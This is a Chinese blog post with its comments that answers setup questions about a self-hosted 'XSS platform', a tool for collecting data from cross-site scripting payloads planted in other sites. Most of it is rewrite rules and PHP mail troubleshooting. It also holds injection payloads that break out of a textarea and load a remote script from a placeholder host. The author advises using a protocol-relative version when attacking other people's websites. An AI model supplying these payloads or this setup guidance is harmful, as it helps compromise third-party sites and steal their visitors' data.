A-A+

如何让XSS平台支持HTTPS – 各种XSS平台问题锦集

2018年03月11日 18:04 学习笔记 评论 33 条 共2405字 (阅读20,855 views次)

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

前言:网上可以下载的XSS平台源码总共就那么几个,比较少吧,我在16年9月份发布了【最新特别完善版XSS平台源代码】,网上的70%的平台用的都是这套程序。之后经常遇到各种朋友来问我关于XSS的各种相关问题,其中跟XSS平台相关的问题比较多。这里我列举了几个最多的问题做一一的解答。

第一个问题:

如何让XSS平台支持HTTPS?

答:首先这里含有一个隐藏的问题,就是"XSS平台"需要支持HTTPS吗?我个人的答案是”不需要”。那如何XSS带有HTTPS的站点,其实很简单,首先你需要明白,对方如果是https的站点,那么按照网站通讯原理,它只能加载https的代码。那问题就简单了,我们只需要让我们的xss平台的项目代码支持https即可。

xss平台项目代码

xss平台项目代码

首先正常安装XSS平台,安装完,访问所有的功能都正常后。让网站支持https,这里要注意,伪静态规则什么的千万都不要动。既然网站支持HTTPS了,那么咱们看一下项目代码,这里举例,例如咱们的项目代码是

</tExtArEa>'"><sCRiPt sRC=http://xxxx.com/xxxx></sCrIpT>

那我们访问一下上面项目中的蓝色的那个网址(注意,上面默认的是http的),我们可以改成https的访问一下试试。https://xxxx.com/xxxx 当你打开的时候,正常的显示了你的项目代码,那么就是成功了。完全没必要让平台支持https,项目代码这里支持就可以。然后默认模块的代码处把http也改成https即可。如下图:

默认模块的项目代码也更改一下即可

默认模块的项目代码也更改一下即可

 

问题二:

访问平台项目代码会出现页面404,例如访问http://xxxx.com/xxxx 出现404如何解决?

答:这个问题10有89是XSS平台伪静态规则没有生效出问题了。首先看一下,自带的默认规则是:



RewriteEngine On
RewriteBase /
RewriteRule ^([0-9a-zA-Z]{4})$ xss.php?do=code&urlKey=$1
RewriteRule ^([0-9a-zA-Z]{6})$ xss.php?do=code&urlKey=$1
RewriteRule ^do/auth/(\w+?)(/domain/([\w\.]+?))?$ xss.php?do=do&auth=$1&domain=$3
RewriteRule ^register/(.*?)$ xss.php?do=register&key=$1 
RewriteRule ^register-validate/(.*?)$ xss.php?do=register&act=validate&key=$1
RewriteRule ^login$ xss.php?do=login

这是XSS平台默认的规则,如果这个规则不可以,就请更改XSS平台的伪静态规则文件.htaccess换成如下代码。



RewriteEngine On
RewriteBase /
rewrite "^/([0-9a-zA-Z]{4})$" /xss.php?do=code&urlKey=$1;
rewrite "^/([0-9a-zA-Z]{6})$" /xss.php?do=code&urlKey=$1;
rewrite ^/do/auth/(w+?)(/domain/([w.]+?))?$ /xss.php?do=do&auth=$1&domain=$3;
rewrite ^/register/(.*?)$ /xss.php?do=register&key=$1;
rewrite ^/register-validate/(.*?)$ /xss.php?do=register&act=validate&key=$1;
rewrite ^/login$ /xss.php?do=login;

这里还有另一个可能性,就是你把XSS平台源码放进了二级目录,如果是这样,那你需要更改一下伪静态。需要在伪静态代码前面加入:
RewriteBase /www

 

问题三:
xss平台为什么发不了信?XSS平台无法发送邮件提示?
答:首先你要确认你的空间绝对支持PHP发信,你自己可以随便找一个发信的文件测试一下。 建议用163的邮箱发送邮件。
php.ini这个中的extension=php_sockets.dll这个模块一定是要开启的,如果还不可以,那就可能不支持默认的发信方法,需要更改一下发信规则转换成ssl的发信方法。
具体方法为首先找到source文件夹,然后打开里面的function.php文件,然后如下图所示更改。

把XSS平台发邮件提示功能改为SSL发信方式

把XSS平台发邮件提示功能改为SSL发信方式

 

问题四:
XSS平台设置好后错误或者空白,或者登录后空白??
答:注意你的PHP版本问题,选5.3版本或者php 5.4版本然后再试试。或者5.6的PHP版本!!!!
最终实在实在实在不行,请你用wampserver 这个软件搭建环境,然后测试。【亲测无误!!!】

细节一:

1
<sCRiPt sRC=//xxxx.com/xxx></sCrIpT>

大家X别人网站的时候,建议用上面的方法,注意上面, 并没有放入http或者https,这样X如别人的网站,XSS会自动适应对方的网站,如果对方网站是https那么,这里会自动变成https://xxxxx.com/xxx 如果对方的网站是http那么这里就会自动走http的协议。。。

这里推荐大家看看 Xss平台详细使用教程 相信你绝对会有收获。

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

×

33 条留言  访客:33 条  博主:0 条

  1. 嘻嘻嘻

    用163也不行

  2. xx

    你好,请问下nginx伪静态规则,设置好伪静态后,网站的连接需要手动更改吗?发现配置好伪静态网站URL地址还一直是动态的地址

    • gdd

      不需要的,只需要开启为伪静态就可以,我记得默认是开启伪静态的。

      • xx

        那为啥我折腾半天,网站的地址还是没有改变呢?我访问 dsad/1.jpg 这样的图片js都能成功,说明伪静态是布置好了的,但是网站的连接全部都还是动态的,另外大佬,你邮箱被腾讯拉黑了,才看到垃圾箱

  3. 马栏山

    啥时候发个支持php7的版本。。。

  4. xx

    大佬,密码找回代码可否分享一波? 😐

  5. 小雪龍

    xss平台我搭建好了,就是在注册的时候出现:出错了,请联系管理员
    这个错误,是我哪里配置错了么

  6. 你猜

    lnmp(php5.6/5.5 下空白页)
    我就是想来看看有没有人在linux下用lnmp搭建成功的….

    • 你猜

      呃。。终于OK了…我就说版本应该不是问题 🙁 结果是权限问题…已经搞好了 大佬 😀

      • Coco

        朋友你后台能登录吗?

  7. ssss

    访问xss.php?do=login 是空白是怎么回事呢??

    • ssss

      apache2.4,php5.6,网页目录的权限也都是777了,还是访问xss.php?do=login空白

  8. Coco

    大佬我能正常访问首页但是访问 /admin/index.php的时候就会出现 Access Denied 这个错误,请问这个怎么解决啊,主页是能正常访问,
    望回复

    • Coco

      宝塔Linux nginx php5.6,伪静态转换过了

给我留言取消回复